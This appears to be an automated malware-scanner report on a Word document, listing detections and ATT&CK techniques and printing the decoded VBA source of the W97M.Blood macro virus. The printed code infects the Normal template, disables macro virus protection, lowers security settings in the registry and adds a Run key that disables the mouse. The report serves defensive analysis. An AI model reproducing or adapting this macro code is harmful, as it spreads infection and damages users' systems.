MALICIOUS
348
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1204.002 Malicious File
The sample contains VBA macros with AutoOpen and Auto_Close subroutines, indicative of malicious intent. The 'Shell()' call within the VBA code strongly suggests the execution of arbitrary commands, likely to download and run a secondary payload. The ClamAV detections further confirm its malicious nature.
Heuristics 8
-
ClamAV: Win.Trojan.Pivis-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Pivis-2
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4325 bytes |
SHA-256: 7131761b551a4b5e74b5a06aa292c3050e78ef00c44ac19ba98687a5a37635ea |
|||
|
Detection
ClamAV:
Doc.Trojan.Petman-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
On Error Resume Next
Const marker = "<-this is a marker"
Dim savedocument, savenormaltemplate, dti, nti As Boolean
Dim ad, nt As Object
Dim ourcode As String
Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
Set nt = NormalTemplate.VBProject.VBComponents.Item(1)
dti = ad.CodeModule.Find(marker, 1, 1, 10000, 10000)
nti = nt.CodeModule.Find(marker, 1, 1, 10000, 10000)
'If Day(Now()) = 29 Then
' Selection.TypeText "hello,you have been cracked!"
'End If
If dti = True Xor nti = True Then
If dti = True Then
savenormaltemplate = NormalTemplate.Saved
ourcode = ad.CodeModule.Lines(1, ad.CodeModule.countoflines)
For Each Template In tempaltes
Template.VBProject.VBComponents.Item(1).codemoudle.deletelines 1, ad.CodeModule.countoflines
Template.VBProject.VBComponents.Item(1).CodeModule.AddFromString ourcode
Template.VBProject.VBComponents.Item(1).Save
Next Template
nt.codemoudle.deletelines 1, ad.CodeModule.countoflines
nt.CodeModule.AddFromString ourcode
nt.Save
End If
If nti = True Then
savedocument = ActiveDocument.Saved
ourcode = nt.CodeModule.Lines(1, nt.CodeModule.countoflines)
ad.codemoudle.deletelines 1, nt.CodeModule.countoflines
ad.CodeModule.AddFromString ourcode
nt.Save
End If
End If
End Sub
Attribute VB_Name = "Blood"
Sub AutoOpen()
On Error Resume Next
With Options
.ConfirmConversions = False
.VirusProtection = False
.SaveNormalPrompt = False
End With
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") = 1&
WordBasic.DisableAutoMacros 0
Set Nor = NormalTemplate.VBProject.VBComponents
Set Doc = ActiveDocument.VBProject.VBComponents
win = Environ("windir")
DropFile = win & "\blood.sys"
If System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Blood\", "InfectDot") <> "OK" Then
Doc("Blood").Export DropFile
Nor.import DropFile
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Blood\", "InfectDot") = "OK"
End If
If Doc.Item("Blood").Name <> "Blood" Then
Nor("Blood").Export DropFile
Doc.import DropFile
ActiveDocument.Save
End If
If Day(Now) = 15 Then
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\", "RegisteredOwner") = "BloodMan"
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\", "RegisteredOrganization") = "PetiK Corporation"
End If
End Sub
Sub HelpAbout()
With Application.Assistant
.Visible = True
End With
With Assistant.NewBalloon
.Text = "W97M.Blood.A coded by PetiK (c)2001"
.Heading = "W97M.Blood"
.Animation = msoAnimationGetAttentionMajor
.Button = msoButtonSetOK
.Show
End With
End Sub
Sub ViewVBCode()
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\", "Blood1") = "rundll32 mouse,disable"
MsgBox "Your computer is dead." + vbCr + "Don't stop your machine", vbCritical, "W97M.Blood"
ShowVisualBasicEditor = True
End Sub
Sub AutoClose()
MsgBox "PetiK vous souhaite une trטs bonne journיe", vbExclamation, "W97M.Blood"
Call PetiK
Call Attak
End Sub
Sub PetiK()
On Error Resume Next
win = Environ("windir")
FileSystem.MkDir win & "\Blood"
Open win & "\Blood\TitleBlood.txt" For Output As #1
Print #1, "For the new Macro Virus W97M.Blood by PetiK"
Print #1, ""
Print #1, "Hi " & Application.UserName & ","
Print #1, "How do you do ?"
Print #1, "Your computer is infected by Blood"
Print #1, "It's not a dangerous macro."
Print #1, " B
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.